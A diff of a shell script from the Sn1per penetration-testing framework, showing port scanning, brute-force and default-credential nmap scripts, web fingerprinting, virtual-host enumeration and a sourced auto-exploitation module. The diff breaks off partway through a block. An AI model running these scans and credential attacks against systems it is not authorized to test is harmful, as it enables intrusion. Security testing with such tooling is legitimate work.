@ -4,7 +4,7 @@ if [[ "$REPORT" = "1" ]]; then
|
|||
if [[ "$OSINT" = "1" ]]; then
|
||||
args="$args -o"
|
||||
fi
|
||||
if [[ "$AUTOBRUTE" = "1" ]]; then
|
||||
if [[ "$AUTO_BRUTE" = "1" ]]; then
|
||||
args="$args -b"
|
||||
fi
|
||||
if [[ "$FULLNMAPSCAN" = "1" ]]; then
|
||||
|
|
@ -43,15 +43,19 @@ if [[ ! -z $WORKSPACE ]]; then
|
|||
fi
|
||||
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks-unsorted.txt 2> /dev/null
|
||||
mv -f $LOOT_DIR/scans/tasks-unsorted.txt /dev/null $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
if [[ "$MODE" = "" ]]; then
|
||||
MODE="normal"
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
else
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
fi
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/${TARGET}-${MODE}.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -60,7 +64,6 @@ echo -e "${OKGREEN}=============================================================
|
|||
dig all +short $TARGET > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null
|
||||
dig all +short -x $TARGET >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null
|
||||
host $TARGET 2> /dev/null | grep address 2> /dev/null | awk '{print $4}' 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null
|
||||
#dnsenum -f $INSTALL_DIR/wordlists/vhosts.txt --noreverse $TARGET 2> /dev/null
|
||||
mv -f *_ips.txt $LOOT_DIR/ips/ 2>/dev/null
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -91,14 +94,6 @@ elif [[ ! -z "$PORT" ]]; then
|
|||
else
|
||||
nmap -p $DEFAULT_PORTS $NMAP_OPTIONS --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | sed -r "s/</\&lh\;/g" | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING UDP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ -z "$PORT" ]]; then
|
||||
nmap -sU $NMAP_OPTIONS -p $DEFAULT_UDP_PORTS --open $TARGET -oX $LOOT_DIR/nmap/nmap-udp-$TARGET.xml
|
||||
else
|
||||
nmap -sU $NMAP_OPTIONS -p $PORT --open $TARGET -oX $LOOT_DIR/nmap/nmap-udp-$TARGET.xml
|
||||
fi
|
||||
|
||||
rm -f $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null
|
||||
for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do
|
||||
|
|
@ -118,11 +113,15 @@ if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then
|
|||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$TARGET.txt"
|
||||
fi
|
||||
|
||||
PORT_CHANGE=$(cat $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null)
|
||||
if [[ ${#PORT_CHANGE} -ge 2 ]]; then
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
cat $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null | egrep "<|>" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
fi
|
||||
|
||||
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]] && [[ -s "$LOOT_DIR/nmap/ports-$TARGET.diff" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$TARGET.diff"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
cat $LOOT_DIR/nmap/ports-$TARGET.diff | egrep "<|>" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
|
||||
if [[ "$HTTP_PROBE" == "1" ]]; then
|
||||
|
|
@ -195,12 +194,12 @@ port_28017=`grep 'portid="28017"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|||
port_49180=`grep 'portid="49180"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
||||
port_49152=`grep 'portid="49152"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
||||
|
||||
port_67=`grep 'portid="67"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open | grep -v filtered`
|
||||
port_68=`grep 'portid="68"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open | grep -v filtered`
|
||||
port_69=`grep 'portid="69"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open | grep -v filtered`
|
||||
port_123=`grep 'portid="123"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open | grep -v filtered`
|
||||
port_161=`grep 'portid="161"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open | grep -v filtered`
|
||||
port_500=`grep 'portid="500"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open | grep -v filtered`
|
||||
port_67=`grep 'portid="67"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml 2> /dev/null | grep open | grep -v filtered`
|
||||
port_68=`grep 'portid="68"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml 2> /dev/null | grep open | grep -v filtered`
|
||||
port_69=`grep 'portid="69"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml 2> /dev/null | grep open | grep -v filtered`
|
||||
port_123=`grep 'portid="123"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml 2> /dev/null | grep open | grep -v filtered`
|
||||
port_161=`grep 'portid="161"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml 2> /dev/null | grep open | grep -v filtered`
|
||||
port_500=`grep 'portid="500"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml 2> /dev/null | grep open | grep -v filtered`
|
||||
|
||||
if [[ -z "$port_21" ]];
|
||||
then
|
||||
|
|
@ -398,120 +397,6 @@ else
|
|||
fi
|
||||
fi
|
||||
|
||||
if [[ -z "$port_80" ]];
|
||||
then
|
||||
echo -e "$OKRED + -- --=[Port 80 closed... skipping.$RESET"
|
||||
else
|
||||
echo -e "$OKORANGE + -- --=[Port 80 opened... running tests...$RESET"
|
||||
echo "$TARGET" >> $LOOT_DIR/web/webhosts-unsorted.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null$RESET"
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl --connect-timeout=5 --max-time 3 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=10 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s --insecure -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -s -R -L --insecure http://$TARGET > $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s --insecure -R -X OPTIONS http://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port80.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-http-$TARGET.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-http-$TARGET 2> /dev/null
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/web/webcomments-http-$TARGET 2> /dev/null > $LOOT_DIR/web/webcomments-http-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/webcomments-http-$TARGET 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-http-$TARGET.txt 2> /dev/null
|
||||
if [[ "$WAFWOOF" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CHECKING FOR WAF $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
wafw00f http://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-http.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/waf-$TARGET-http.raw > $LOOT_DIR/web/waf-$TARGET-http.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/waf-$TARGET-http.raw 2> /dev/null
|
||||
echo ""
|
||||
fi
|
||||
if [[ "$WHATWEB" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING HTTP INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
whatweb -a 3 http://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-http.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-http.raw > $LOOT_DIR/web/whatweb-$TARGET-http.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/whatweb-$TARGET-http.raw 2> /dev/null
|
||||
fi
|
||||
if [[ "$WIG" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING SERVER INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python3 $PLUGINS_DIR/wig/wig.py -d -q http://$TARGET | tee $LOOT_DIR/web/wig-$TARGET-http
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-http > $LOOT_DIR/web/wig-$TARGET-http.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/wig-$TARGET-http 2> /dev/null
|
||||
fi
|
||||
if [[ "$WEBTECH" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
webtech -u http://$TARGET | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-http.txt
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCANNING FOR VIRTUAL HOSTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$VHOSTS" == "1" ]]; then
|
||||
gobuster vhost -u http://$TARGET -w $INSTALL_DIR/wordlists/vhosts.txt -o $LOOT_DIR/osint/vhosts-http-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$NMAP_SCRIPTS" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap -Pn -p 80 -sV -v --script-timeout 90 --script=http-auth-finder,http-auth,http-brute,/usr/share/nmap/scripts/vulners,http-default-accounts --script-args http-default-accounts.fingerprintfile=/usr/share/sniper/bin/http-default-accounts-fingerprints-nndefaccts.lua $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port80
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port80 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port80.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/nmap-$TARGET-port80 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ $CUTYCAPT = "1" ]]; then
|
||||
if [[ $DISTRO == "blackarch" ]]; then
|
||||
/bin/CutyCapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
else
|
||||
cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
if [[ $WEBSCREENSHOT = "1" ]]; then
|
||||
cd $LOOT_DIR
|
||||
python2 $INSTALL_DIR/bin/webscreenshot.py -r chromium http://$TARGET:80
|
||||
fi
|
||||
|
||||
source $INSTALL_DIR/modes/normal_webporthttp.sh
|
||||
|
||||
cd $INSTALL_DIR
|
||||
PORT="80"
|
||||
SSL="false"
|
||||
source $INSTALL_DIR/modes/web_autopwn.sh
|
||||
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
|
||||
|
||||
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
|
||||
source $file
|
||||
done
|
||||
fi
|
||||
|
||||
source $INSTALL_DIR/modes/osint_stage_2.sh
|
||||
|
||||
fi
|
||||
|
||||
if [[ -z "$port_110" ]];
|
||||
then
|
||||
echo -e "$OKRED + -- --=[Port 110 closed... skipping.$RESET"
|
||||
|
|
@ -720,135 +605,6 @@ else
|
|||
ldapsearch -h $TARGET 389 -x -s base -b '' "(objectClass=*)" "*" + | tee $LOOT_DIR/output/ldapsearch-$TARGET-port389.txt
|
||||
fi
|
||||
|
||||
if [[ -z "$port_443" ]];
|
||||
then
|
||||
echo -e "$OKRED + -- --=[Port 443 closed... skipping.$RESET"
|
||||
else
|
||||
echo -e "$OKORANGE + -- --=[Port 443 opened... running tests...$RESET"
|
||||
echo "$TARGET" >> $LOOT_DIR/web/webhosts-unsorted.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null$RESET"
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl --connect-timeout=5 --max-time 3 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=10 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s --insecure -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -s -R -L --insecure https://$TARGET > $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s --insecure -R -X OPTIONS https://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port443.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cat $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-https-$TARGET.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cat $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-https-$TARGET 2> /dev/null
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/web/webcomments-https-$TARGET 2> /dev/null > $LOOT_DIR/web/webcomments-https-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/webcomments-https-$TARGET 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cat $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-https-$TARGET.txt 2> /dev/null
|
||||
if [[ "$WAFWOOF" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CHECKING FOR WAF $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
wafw00f https://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-https.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/waf-$TARGET-https.raw > $LOOT_DIR/web/waf-$TARGET-https.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/waf-$TARGET-https.raw 2> /dev/null
|
||||
echo ""
|
||||
fi
|
||||
if [[ "$WHATWEB" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING HTTP INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
whatweb -a 3 https://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-https.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-https.raw > $LOOT_DIR/web/whatweb-$TARGET-https.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/whatweb-$TARGET-https.raw 2> /dev/null
|
||||
fi
|
||||
if [[ "$WIG" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING SERVER INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python3 $PLUGINS_DIR/wig/wig.py -d -q https://$TARGET | tee $LOOT_DIR/web/wig-$TARGET-https
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-https > $LOOT_DIR/web/wig-$TARGET-https.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/wig-$TARGET-https 2> /dev/null
|
||||
fi
|
||||
if [[ "$WEBTECH" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
webtech -u https://$TARGET | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-https.txt
|
||||
fi
|
||||
if [[ "$NMAP_SCRIPTS" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap -sV -Pn -p 443 -v --script-timeout 90 --script=http-auth-finder,http-auth,http-brute,/usr/share/nmap/scripts/vulners,http-default-accounts $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port443
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port443 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port443.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/nmap-$TARGET-port443 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCANNING FOR VIRTUAL HOSTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$VHOSTS" == "1" ]]; then
|
||||
gobuster vhost -u https://$TARGET -w $INSTALL_DIR/wordlists/vhosts.txt -o $LOOT_DIR/osint/vhosts-https-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$SSL" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING SSL/TLS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
sslscan --no-failed $TARGET | tee $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/sslscan-$TARGET.raw > $LOOT_DIR/web/sslscan-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null
|
||||
echo ""
|
||||
fi
|
||||
if [[ "$SSL_INSECURE" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CHECKING FOR INSECURE SSL/TLS CONFIGURATIONS $RESET"
|
||||
